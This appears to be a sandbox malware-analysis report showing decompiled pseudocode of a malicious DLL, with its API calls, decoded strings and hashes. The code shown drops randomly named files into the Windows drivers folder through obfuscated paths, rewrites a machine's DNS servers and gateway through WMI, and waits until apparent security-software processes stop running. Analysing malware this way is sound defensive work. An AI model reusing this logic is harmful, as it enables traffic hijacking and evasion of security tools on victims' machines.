            							_t183 = _t183 + _t82 - 1;
            						}
            						_t183 = _t183 + 1;
            						__eflags = _t183 - _t202;
            					} while (__eflags <= 0);
            				} else {
            					_t204 =  *0x1000e1b8;
            					_t142 =  *0x1000e248;
            					_t186 =  *((intOrPtr*)(_a8 + 0xc)) -  *0x10015fb8;
            					_t4 =  &_a12;
            					 *_t4 = _a12 & 0x00000000;
            					_t216 =  *_t4;
            					_v8 = _t186;
            					do {
            						_t88 =  *0x10015fb8; // 0x0
            						_push(_t88 - 1);
            						_push(_a12 + _a4);
            						_push( *0x10015fc8);
            						_t82 = E1000CDA6(_a4, _a12 + _a4, _t170, _t216);
            						_t206 = _t206 + 0xc;
            						_t217 = _t82;
            						if(_t82 == 0) {
            							_v72 = _v72 & _t82;
            							_t147 = 0xf;
            							memset( &_v71, _t82, _t147 << 2);
            							asm("stosw");
            							asm("stosb");
            							wsprintfA( &_v72, "%s\\%s", 0x100165a4, 0x100165a8);
            							_v4948 = _v4948 & 0x00000000;
            							memset( &_v4947, 0, 0x3ff << 2);
            							asm("stosw");
            							asm("stosb");
            							E10005318(0, _t217,  &_v4948);
            							_v852 = _v852 & 0x00000000;
            							_t151 = 0x40;
            							_v592 = _v592 & 0x00000000;
            							memset( &_v851, 0, _t151 << 2);
            							asm("stosw");
            							asm("stosb");
            							_push(0x40);
            							memset( &_v591, 0, 0 << 2);
            							asm("stosw");
            							asm("stosb");
            							wsprintfA( &_v852, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
            							_push(0x100165a8);
            							_t104 = E10001000(0, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz");
            							_t155 = 0x100165a4;
            							wsprintfA( &_v592, _t104);
            							_push(0);
            							_push( &_v852);
            							E1002B8D2(_t142, _t155, _t170, 0x100165a4, _t204);
            							asm("cdq");
            							E1000443D( &_v4948, _t142, _t155, _t170,  &_v4948,  &_v592);
            							_pop(_t157);
            							E10021A45( *_a8 + _a12, _t142, _t157, _t170, 0x100165a4, _t204, _t217);
            							_v332 = _v332 & 0x00000000;
            							_t158 = 0x40;
            							_t118 = memset( &_v331, 0, _t158 << 2);
            							asm("stosw");
            							asm("stosb");
            							0x1003a38c(_t142, 0, _t170,  *0x10015ff4,  *_a8 + _a12,  &_v72, 9, 0);
            							E100274E5(_t118, _t142, _t170, _t204, _t205, _t217);
            							_t120 = rand();
            							asm("cdq");
            							_t162 = 0x18;
            							_t198 = 0x61;
            							_t122 = rand();
            							asm("cdq");
            							_t163 = 0x19;
            							_t124 = rand();
            							asm("cdq");
            							_t164 = 0x17;
            							_t126 = rand();
            							asm("cdq");
            							_t165 = 0x19;
            							_t128 = rand();
            							asm("cdq");
            							_t166 = 0x18;
            							_t130 = rand();
            							asm("cdq");
            							_t167 = 0x19;
            							_t170 = _t130 % _t167 + _t198;
            							_t132 = E10001000(_t167, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj");
            							_t168 = _t170;
            							wsprintfA( &_v332, _t132);
            							_t206 = _t206 + 0x8c;
            							_t136 =  &_v332;
            							0x10036371(0x40000000, 1, 0, 2, 0, 0, _t128 % _t166 + _t198, _t126 % _t165 + _t198, _t124 % _t164 + _t198, _t122 % _t163 + _t198, _t120 % _t162 + _t198, 0, _t118);
            							_t199 = _t136;
            							_push(_t136);
            							_push(_t170);
            							E10023C7B(_t136, _t142, _t168, _t199, _t204, 0);
            							Sleep(0x3e8);
            							_t138 =  &_v332;
            							_push(_t138);
            							_push(_t138);
            							E1002EC87(_t138, _t142, _t168, 0);
            							_t169 =  *0x10015fb8; // 0x0
            							_t186 = _v8;
            							_t82 = _a12 + _t169 - 1;
            							_a12 = _t82;
            						}
            						_a12 = _a12 + 1;
            					} while (_a12 <= _t186);
            				}
            				return _t82;
            			}
























































            0x100053b7
            0x100053b7
            0x100053b7
            0x100053bf
            0x100053ca
            0x100055e9
            0x100055ee
            0x100055f0
            0x100055f0
            0x100055f2
            0x100055f5
            0x100055fb
            0x100055fc
            0x10005602
            0x10005607
            0x1000560a
            0x1000560c
            0x10005611
            0x10005613
            0x10005613
            0x10005617
            0x10005618
            0x10005618
            0x100053d0
            0x100053d3
            0x100053da
            0x100053e3
            0x100053e9
            0x100053e9
            0x100053e9
            0x100053ed
            0x100053f0
            0x100053f0
            0x100053f9
            0x100053ff
            0x10005400
            0x10005406
            0x1000540b
            0x1000540e
            0x10005410
            0x10005416
            0x1000541b
            0x1000541f
            0x10005421
            0x10005423
            0x10005437
            0x10005439
            0x1000544d
            0x1000544f
            0x10005451
            0x10005459
            0x1000545e
            0x10005467
            0x10005470
            0x10005477
            0x10005479
            0x1000547b
            0x1000547c
            0x10005487
            0x10005489
            0x1000548b
            0x1000549e
            0x100054a3
            0x100054ae
            0x100054b3
            0x100054bc
            0x100054c7
            0x100054c9
            0x100054ca
            0x100054cf
            0x100054de
            0x100054e7
            0x100054fc
            0x10005502
            0x1000550b
            0x10005516
            0x10005518
            0x1000551a
            0x1000551c
            0x10005523
            0x1000552a
            0x1000552e
            0x1000552f
            0x10005534
            0x10005538
            0x1000553c
            0x1000553d
            0x10005543
            0x10005547
            0x10005548
            0x1000554e
            0x10005552
            0x10005553
            0x10005559
            0x1000555d
            0x1000555e
            0x10005564
            0x10005568
            0x10005569
            0x1000556c
            0x10005574
            0x10005579
            0x10005582
            0x10005584
            0x10005590
            0x1000559c
            0x100055a1
            0x100055a2
            0x100055a3
            0x100055a4
            0x100055ae
            0x100055b4
            0x100055ba
            0x100055bb
            0x100055bc
            0x100055c4
            0x100055ca
            0x100055cd
            0x100055d1
            0x100055d1
            0x100055d4
            0x100055d7
            0x100055e0
            0x1000561f

            APIs
            • wsprintfA.USER32 ref: 10005437
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0
            • wsprintfA.USER32 ref: 1000549E
            • wsprintfA.USER32 ref: 100054BC
            • PrintFile.ABC(?,?,?,00000000), ref: 100054DE
            • rand.MSVCRT ref: 1000552A
            • rand.MSVCRT ref: 10005538
            • rand.MSVCRT ref: 10005543
            • rand.MSVCRT ref: 1000554E
            • rand.MSVCRT ref: 10005559
            • rand.MSVCRT ref: 10005564
            • wsprintfA.USER32 ref: 10005582
            • Sleep.KERNEL32(000003E8,?,00000000,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,?,00000009,00000000,?), ref: 100055AE
            Strings
            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
            • %s\%s, xrefs: 10005431
            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
            • c:\windows\system32\drivers\%s, xrefs: 10005498
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
            • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
            • API String ID: 3997227624-455112146
            • Opcode ID: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
            • Instruction ID: 64546e9388752df838bc4033515aa0a8afcfc879ecc6bfc3b3dc2cd959c3d1fd
            • Opcode Fuzzy Hash: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
            • Instruction Fuzzy Hash: 0D610873A40258BFEB10DB64CC46FDF77ADEB84351F184466F604AB180CBB5EA818A64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 55%
            			E1000721F(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags, void* __fp0) {
            				void* _t141;
            				void* _t142;
            				intOrPtr* _t150;
            				intOrPtr _t151;
            				intOrPtr* _t152;
            				intOrPtr _t153;
            				intOrPtr* _t160;
            				intOrPtr _t161;
            				void* _t162;
            				intOrPtr* _t164;
            				intOrPtr _t165;
            				intOrPtr* _t170;
            				intOrPtr _t171;
            				intOrPtr _t173;
            				intOrPtr _t177;
            				intOrPtr _t178;
            				intOrPtr* _t183;
            				intOrPtr _t184;
            				intOrPtr* _t188;
            				intOrPtr _t189;
            				intOrPtr* _t193;
            				intOrPtr* _t194;
            				void* _t196;
            				signed int _t201;
            				intOrPtr _t204;
            				void* _t209;
            				intOrPtr* _t210;
            				intOrPtr _t215;
            				intOrPtr* _t226;
            				intOrPtr* _t229;
            				intOrPtr* _t230;
            				intOrPtr* _t239;
            				intOrPtr* _t242;
            				intOrPtr* _t245;
            				intOrPtr _t256;
            				intOrPtr _t260;
            				intOrPtr* _t261;
            				void* _t266;
            
            				_t307 = __fp0;
            				_t272 = __eflags;
            				_t254 = __edi;
            				_t250 = __edx;
            				_t209 = __ebx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__esi);
            				E1000774B();
            				_push("IPEnabled=TRUE");
            				_push("Win32_NetworkAdapterConfiguration");
            				 *((intOrPtr*)(_t266 - 4)) = 0;
            				if(E100077B2(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t272, __fp0) == 0) {
            					L61:
            					_t215 = _t266 - 0x7c;
            					 *((intOrPtr*)(_t266 - 4)) = 0xb;
            					_t141 = E1002A8C6(E10007A27(_t215), _t209, _t215, _t250, _t254, _t266);
            					asm("cld");
            					 *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) =  *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) - 1;
            					asm("adc al, [eax]");
            					 *((intOrPtr*)(_t209 + 0x645ef44d)) =  *((intOrPtr*)(_t209 + 0x645ef44d)) + _t215;
            					 *0 = _t215;
            					return _t141;
            				} else {
            					_push(__edi);
            					 *((intOrPtr*)(_t266 - 0x14)) = 0;
            					 *((char*)(_t266 - 4)) = 1;
            					if( *((intOrPtr*)(_t266 - 0x68)) != 0) {
            						_t201 =  *((intOrPtr*)(_t266 - 0x64)) -  *((intOrPtr*)(_t266 - 0x68));
            						_t275 = _t201 & 0xfffffffc;
            						if((_t201 & 0xfffffffc) > 0) {
            							_push("Index");
            							_push(0);
            							_push(_t266 - 0x28);
            							_t254 = E10007A73(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t275, __fp0);
            							_t204 =  *_t254;
            							if(_t204 != 0) {
            								0x1003afbd(_t254, _t204 + 8);
            							}
            							E10007696(_t266 - 0x14);
            							 *((intOrPtr*)(_t266 - 0x14)) =  *_t254;
            							E10007696(_t266 - 0x28);
            						}
            					}
            					_t142 = E1000767F(_t266 - 0x14, _t250);
            					_t278 = _t142;
            					if(_t142 == 0) {
            						L59:
            						_t217 =  *((intOrPtr*)(_t266 - 0x14));
            						_pop(_t254);
            						if( *((intOrPtr*)(_t266 - 0x14)) != 0) {
            							E1000515C(_t142, _t217);
            							 *((intOrPtr*)(_t266 - 0x14)) = 0;
            						}
            						goto L61;
            					}
            					_push(_t209);
            					_push("Win32_NetworkAdapterConfiguration.Index=");
            					E1000504D(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
            					_t219 = _t266 - 0x18;
            					_push(_t266 - 0x14);
            					 *((char*)(_t266 - 4)) = 2;
            					_t142 = E1000762A(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
            					_t210 =  *0x1000e218;
            					 *((intOrPtr*)(_t266 - 0x10)) = 0;
            					 *((intOrPtr*)(_t266 - 0x28)) = 0;
            					if( *((intOrPtr*)(_t266 + 8)) != 0) {
            						_push( *((intOrPtr*)(_t266 + 8)));
            						_t142 = E1000CD02(_t219, 0);
            						_t280 = _t142;
            						_pop(_t219);
            						if(_t142 != 0) {
            							_t219 = _t266 - 0x7c;
            							_push(_t266 - 0x10);
            							_push("SetGateways");
            							_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t280, _t307);
            							_t281 = _t142;
            							if(_t142 >= 0) {
            								asm("stosd");
            								_t260 = 1;
            								 *((intOrPtr*)(_t266 - 0x38)) = 0;
            								_push( *((intOrPtr*)(_t266 + 8)));
            								 *((intOrPtr*)(_t266 - 0x3c)) = _t260;
            								E1000504D(_t210, _t266 - 0x24, _t250, _t260, 0, _t281, _t307);
            								_t170 =  *((intOrPtr*)(_t266 - 0x24));
            								 *((char*)(_t266 - 4)) = 3;
            								_t282 = _t170;
            								if(_t170 == 0) {
            									_t171 = 0;
            									__eflags = 0;
            								} else {
            									_t171 =  *_t170;
            								}
            								 *((intOrPtr*)(_t266 - 0x2c)) = _t171;
            								_t173 =  *_t210(8, _t260, _t266 - 0x3c);
            								_t261 =  *0x1000e230;
            								 *((intOrPtr*)(_t266 - 0x1c)) = _t173;
            								 *((intOrPtr*)(_t173 + 0xc)) = _t266 - 0x2c;
            								 *_t261(_t266 - 0x4c);
            								 *((intOrPtr*)(_t266 - 0x44)) =  *((intOrPtr*)(_t266 - 0x1c));
            								_t177 = 1;
            								 *((short*)(_t266 - 0x4c)) = 0x2008;
            								 *((intOrPtr*)(_t266 - 0x30)) = _t177;
            								_t178 =  *_t210(3, _t177, _t266 - 0x3c);
            								 *((intOrPtr*)(_t266 - 0x20)) = _t178;
            								 *((intOrPtr*)(_t178 + 0xc)) = _t266 - 0x30;
            								 *_t261(_t266 - 0x5c);
            								_push("DefaultIPGateway");
            								 *((short*)(_t266 - 0x5c)) = 0x2003;
            								 *((intOrPtr*)(_t266 - 0x54)) =  *((intOrPtr*)(_t266 - 0x20));
            								_t183 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8, _t250, _t261, 0, _t282, _t307)));
            								 *((char*)(_t266 - 4)) = 4;
            								_t283 = _t183;
            								if(_t183 == 0) {
            									_t184 = 0;
            									__eflags = 0;
            								} else {
            									_t184 =  *_t183;
            								}
            								_t239 =  *((intOrPtr*)(_t266 - 0x10));
            								 *((intOrPtr*)( *_t239 + 0x14))(_t239, _t184, 0, _t266 - 0x4c, 0);
            								 *((char*)(_t266 - 4)) = 3;
            								E10007696(_t266 + 8);
            								_push("GatewayCostMetric");
            								_t188 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8,  *_t239, _t266 - 0x4c, 0, _t283, _t307)));
            								 *((char*)(_t266 - 4)) = 5;
            								_t284 = _t188;
            								if(_t188 == 0) {
            									_t189 = 0;
            									__eflags = 0;
            								} else {
            									_t189 =  *_t188;
            								}
            								_t242 =  *((intOrPtr*)(_t266 - 0x10));
            								 *((intOrPtr*)( *_t242 + 0x14))(_t242, _t189, 0, _t266 - 0x5c, 0);
            								 *((char*)(_t266 - 4)) = 3;
            								E10007696(_t266 + 8);
            								_push("SetGateways");
            								_t193 =  *((intOrPtr*)(E1000504D(_t210, _t266 - 0x34,  *_t242, _t266 - 0x5c, 0, _t284, _t307)));
            								 *((char*)(_t266 - 4)) = 6;
            								if(_t193 == 0) {
            									 *((intOrPtr*)(_t266 + 8)) = 0;
            								} else {
            									 *((intOrPtr*)(_t266 + 8)) =  *_t193;
            								}
            								_t194 =  *((intOrPtr*)(_t266 - 0x18));
            								if(_t194 == 0) {
            									_t250 = 0;
            									__eflags = 0;
            								} else {
            									_t250 =  *_t194;
            								}
            								_t254 = _t266 - 0x28;
            								_t245 =  *((intOrPtr*)(_t266 - 0x78));
            								_t196 =  *((intOrPtr*)( *_t245 + 0x60))(_t245, _t250,  *((intOrPtr*)(_t266 + 8)), 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t254, 0);
            								_t246 =  *((intOrPtr*)(_t266 - 0x34));
            								if( *((intOrPtr*)(_t266 - 0x34)) != 0) {
            									E1000515C(_t196, _t246);
            								}
            								0x10035685(_t254,  *((intOrPtr*)(_t266 - 0x1c)));
            								 *_t254();
            								_t142 =  *_t254( *((intOrPtr*)(_t266 - 0x20)));
            								_t219 =  *((intOrPtr*)(_t266 - 0x24));
            								 *((char*)(_t266 - 4)) = 2;
            								if( *((intOrPtr*)(_t266 - 0x24)) != 0) {
            									_t142 = E1000515C(_t142, _t219);
            								}
            							}
            						}
            					}
            					if( *((intOrPtr*)(_t266 + 0xc)) == 0) {
            						L31:
            						if( *((intOrPtr*)(_t266 + 0x10)) == 0) {
            							L57:
            							_t220 =  *((intOrPtr*)(_t266 - 0x18));
            							_pop(_t209);
            							if( *((intOrPtr*)(_t266 - 0x18)) != 0) {
            								_t142 = E1000515C(_t142, _t220);
            								 *((intOrPtr*)(_t266 - 0x18)) = 0;
            							}
            							goto L59;
            						}
            						_push( *((intOrPtr*)(_t266 + 0x10)));
            						_t142 = E1000CD02(_t219, 0);
            						_t292 = _t142;
            						if(_t142 == 0) {
            							goto L57;
            						}
            						L33:
            						_push(_t266 - 0x10);
            						_push("SetDNSServerSearchOrder");
            						_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t292, _t307);
            						_t293 = _t142;
            						if(_t142 >= 0) {
            							_push( *((intOrPtr*)(_t266 + 0xc)));
            							asm("stosd");
            							asm("stosd");
            							asm("stosd");
            							 *((intOrPtr*)(_t266 - 0x58)) = 0;
            							 *((intOrPtr*)(_t266 - 0x5c)) = 2;
            							E1000504D(_t210, _t266 + 0xc, _t250, _t266 - 0x58, 0, _t293, _t307);
            							_push( *((intOrPtr*)(_t266 + 0x10)));
            							 *((char*)(_t266 - 4)) = 7;
            							E1000504D(_t210, _t266 + 8, _t250, _t266 - 0x58, 0, _t293, _t307);
            							_t150 =  *((intOrPtr*)(_t266 + 0xc));
            							 *((char*)(_t266 - 4)) = 8;
            							if(_t150 == 0) {
            								_t151 = 0;
            								__eflags = 0;
            							} else {
            								_t151 =  *_t150;
            							}
            							 *((intOrPtr*)(_t266 - 0x3c)) = _t151;
            							_t152 =  *((intOrPtr*)(_t266 + 8));
            							_t295 = _t152;
            							if(_t152 == 0) {
            								_t153 = 0;
            								__eflags = 0;
            							} else {
            								_t153 =  *_t152;
            							}
            							 *((intOrPtr*)(_t266 - 0x38)) = _t153;
            							_t256 =  *_t210(8, 1, _t266 - 0x5c);
            							 *((intOrPtr*)(_t256 + 0xc)) = _t266 - 0x3c;
            							 *0x1000e230(_t266 - 0x4c);
            							_push("DNSServerSearchOrder");
            							 *((short*)(_t266 - 0x4c)) = 0x2008;
            							 *((intOrPtr*)(_t266 - 0x44)) = _t256;
            							_t160 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t250, _t256, 0, _t295, _t307)));
            							 *((char*)(_t266 - 4)) = 9;
            							if(_t160 == 0) {
            								_t161 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t160;
            							}
            							_t226 =  *((intOrPtr*)(_t266 - 0x10));
            							_t257 = _t266 - 0x4c;
            							_t251 =  *_t226;
            							_t162 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, _t161, 0, _t266 - 0x4c, 0);
            							_t227 =  *((intOrPtr*)(_t266 + 0x10));
            							 *((char*)(_t266 - 4)) = 8;
            							_t297 =  *((intOrPtr*)(_t266 + 0x10));
            							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
            								E1000515C(_t162, _t227);
            							}
            							_push("SetDNSServerSearchOrder");
            							_t164 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t251, _t257, 0, _t297, _t307)));
            							 *((char*)(_t266 - 4)) = 0xa;
            							if(_t164 == 0) {
            								_t165 = 0;
            								__eflags = 0;
            							} else {
            								_t165 =  *_t164;
            							}
            							_t229 =  *((intOrPtr*)(_t266 - 0x18));
            							if(_t229 == 0) {
            								_t250 = 0;
            								__eflags = 0;
            							} else {
            								_t250 =  *_t229;
            							}
            							_t230 =  *((intOrPtr*)(_t266 - 0x78));
            							_t142 =  *((intOrPtr*)( *_t230 + 0x60))(_t230, _t250, _t165, 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t266 - 0x28, 0);
            							_t231 =  *((intOrPtr*)(_t266 + 0x10));
            							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
            								_t142 = E1000515C(_t142, _t231);
            								 *((intOrPtr*)(_t266 + 0x10)) = 0;
            							}
            							_t232 =  *((intOrPtr*)(_t266 + 8));
            							if( *((intOrPtr*)(_t266 + 8)) != 0) {
            								_t142 = E1000515C(_t142, _t232);
            								 *((intOrPtr*)(_t266 + 8)) = 0;
            							}
            							_t233 =  *((intOrPtr*)(_t266 + 0xc));
            							if( *((intOrPtr*)(_t266 + 0xc)) != 0) {
            								_t142 = E1000515C(_t142, _t233);
            								 *((intOrPtr*)(_t266 + 0xc)) = 0;
            							}
            						}
            						goto L57;
            					}
            					_push( *((intOrPtr*)(_t266 + 0xc)));
            					_t142 = E1000CD02(_t219, 0);
            					_pop(_t219);
            					if(_t142 != 0) {
            						goto L33;
            					}
            					goto L31;
            				}
            			}









































            0x1000721f
            0x1000721f
            0x1000721f
            0x1000721f
            0x1000721f
            0x10007224
            0x1000722c
            0x10007230
            0x10007237
            0x1000723c
            0x10007244
            0x1000724e
            0x100075fc
            0x100075fc
            0x100075ff
            0x1000760b
            0x10007613
            0x10007614
            0x1000761a
            0x1000761c
            0x10007622
            0x10007629
            0x10007254
            0x10007254
            0x10007255
            0x1000725b
            0x1000725f
            0x10007264
            0x10007267
            0x1000726c
            0x1000726e
            0x10007276
            0x10007277
            0x10007280
            0x10007282
            0x10007286
            0x1000728d
            0x1000728d
            0x10007295
            0x1000729f
            0x100072a2
            0x100072a2
            0x1000726c
            0x100072aa
            0x100072af
            0x100072b1
            0x100075ec
            0x100075ec
            0x100075ef
            0x100075f2
            0x100075f4
            0x100075f9
            0x100075f9
            0x00000000
            0x100075f2
            0x100072b7
            0x100072b8
            0x100072c0
            0x100072c8
            0x100072cb
            0x100072cc
            0x100072d0
            0x100072d8
            0x100072de
            0x100072e1
            0x100072e4
            0x100072ea
            0x100072ed
            0x100072f2
            0x100072f4
            0x100072f5
            0x100072fe
            0x10007301
            0x10007302
            0x10007307
            0x1000730c
            0x1000730e
            0x10007319
            0x1000731f
            0x10007320
            0x10007323
            0x10007326
            0x10007329
            0x1000732e
            0x10007331
            0x10007335
            0x10007337
            0x1000733d
            0x1000733d
            0x10007339
            0x10007339
            0x10007339
            0x1000733f
            0x10007349
            0x1000734b
            0x10007354
            0x10007357
            0x1000735e
            0x10007365
            0x10007368
            0x1000736c
            0x10007376
            0x10007379
            0x1000737e
            0x10007381
            0x10007388
            0x1000738d
            0x10007395
            0x1000739b
            0x100073a3
            0x100073a5
            0x100073a9
            0x100073ab
            0x100073b1
            0x100073b1
            0x100073ad
            0x100073ad
            0x100073ad
            0x100073b3
            0x100073c0
            0x100073c6
            0x100073ca
            0x100073cf
            0x100073dc
            0x100073de
            0x100073e2
            0x100073e4
            0x100073ea
            0x100073ea
            0x100073e6
            0x100073e6
            0x100073e6
            0x100073ec
            0x100073f9
            0x100073ff
            0x10007403
            0x10007408
            0x10007415
            0x10007417
            0x1000741d
            0x10007426
            0x1000741f
            0x10007421
            0x10007421
            0x10007429
            0x1000742e
            0x10007434
            0x10007434
            0x10007430
            0x10007430
            0x10007430
            0x10007436
            0x1000743a
            0x1000744a
            0x1000744d
            0x10007452
            0x10007454
            0x10007454
            0x1000745d
            0x10007462
            0x10007467
            0x10007469
            0x1000746c
            0x10007472
            0x10007474
            0x10007474
            0x10007472
            0x1000730e
            0x100072f5
            0x1000747c
            0x1000748b
            0x1000748e
            0x100075dc
            0x100075dc
            0x100075df
            0x100075e2
            0x100075e4
            0x100075e9
            0x100075e9
            0x00000000
            0x100075e2
            0x10007494
            0x10007497
            0x1000749c
            0x1000749f
            0x00000000
            0x00000000
            0x100074a5
            0x100074ab
            0x100074ac
            0x100074b1
            0x100074b6
            0x100074b8
            0x100074c3
            0x100074c9
            0x100074ca
            0x100074cb
            0x100074cc
            0x100074cf
            0x100074d6
            0x100074db
            0x100074e1
            0x100074e5
            0x100074ea
            0x100074ed
            0x100074f3
            0x100074f9
            0x100074f9
            0x100074f5
            0x100074f5
            0x100074f5
            0x100074fb
            0x100074fe
            0x10007501
            0x10007503
            0x10007509
            0x10007509
            0x10007505
            0x10007505
            0x10007505
            0x1000750b
            0x10007518
            0x1000751d
            0x10007524
            0x1000752a
            0x10007532
            0x10007538
            0x10007540
            0x10007542
            0x10007548
            0x1000754e
            0x1000754e
            0x1000754a
            0x1000754a
            0x1000754a
            0x10007550
            0x10007553
            0x10007558
            0x1000755d
            0x10007560
            0x10007563
            0x10007567
            0x10007569
            0x1000756b
            0x1000756b
            0x10007570
            0x1000757d
            0x1000757f
            0x10007585
            0x1000758b
            0x1000758b
            0x10007587
            0x10007587
            0x10007587
            0x1000758d
            0x10007592
            0x10007598
            0x10007598
            0x10007594
            0x10007594
            0x10007594
            0x1000759a
            0x100075ac
            0x100075af
            0x100075b4
            0x100075b6
            0x100075bb
            0x100075bb
            0x100075be
            0x100075c3
            0x100075c5
            0x100075ca
            0x100075ca
            0x100075cd
            0x100075d2
            0x100075d4
            0x100075d9
            0x100075d9
            0x100075d2
            0x00000000
            0x100074b8
            0x1000747e
            0x10007481
            0x10007488
            0x10007489
            0x00000000
            0x00000000
            0x00000000
            0x10007489

            APIs
            • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007349
            • VariantInit.OLEAUT32(?), ref: 1000735E
            • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007379
            • VariantInit.OLEAUT32(?), ref: 10007388
              • Part of subcall function 10007A73: VariantInit.OLEAUT32(?), ref: 10007AB2
            • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007516
            • VariantInit.OLEAUT32(?), ref: 10007524
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitVariant$ArrayCreateSafe
            • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
            • API String ID: 2640012081-1668994663
            • Opcode ID: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
            • Instruction ID: e82695035937c1bda44e76a486134160da36d7b78c3243b38af4a6a2dd8dd1e6
            • Opcode Fuzzy Hash: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
            • Instruction Fuzzy Hash: 7AD14C70D00219EFEB15CFA4C8809EEBBB8FF49781F104019F519AB259DB75AA45CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 44%
            			E10006EEF() {
            				signed int _v8;
            				void _v267;
            				signed char _v268;
            				void _v527;
            				signed char _v528;
            				void _v783;
            				signed char _v784;
            				void _v1807;
            				signed char _v1808;
            				void _v5903;
            				signed char _v5904;
            				void* _t53;
            				void* _t65;
            				signed int _t76;
            				signed int _t90;
            				void* _t94;
            				void* _t95;
            				void* _t96;
            				signed int _t100;
            				void* _t102;
            				void* _t109;
            				signed int _t110;
            				void* _t117;
            				void* _t118;
            				signed int _t130;
            				intOrPtr* _t132;
            				void* _t134;
            				char** _t135;
            				char** _t138;
            				char** _t140;
            				void* _t143;
            				void* _t146;
            
            				E1000CD20(0x170c, _t96);
            				_push(_t94);
            				_t132 = E10001000(_t96, _t143, _t146, "QVNEU3ZjLmV4ZQ==");
            				 *_t135 = "QVlSVFNydi5heWU=";
            				_t118 = E10001000(_t96, _t143, _t146, _t117);
            				L1:
            				if(E1000591C(_t132) != 0 || E1000591C(_t118) != 0) {
            					Sleep(0xea60);
            					goto L1;
            				}
            				_v268 = _v268 & 0x00000000;
            				_t100 = 0x40;
            				_v528 = _v528 & 0x00000000;
            				memset( &_v267, 0, _t100 << 2);
            				asm("stosw");
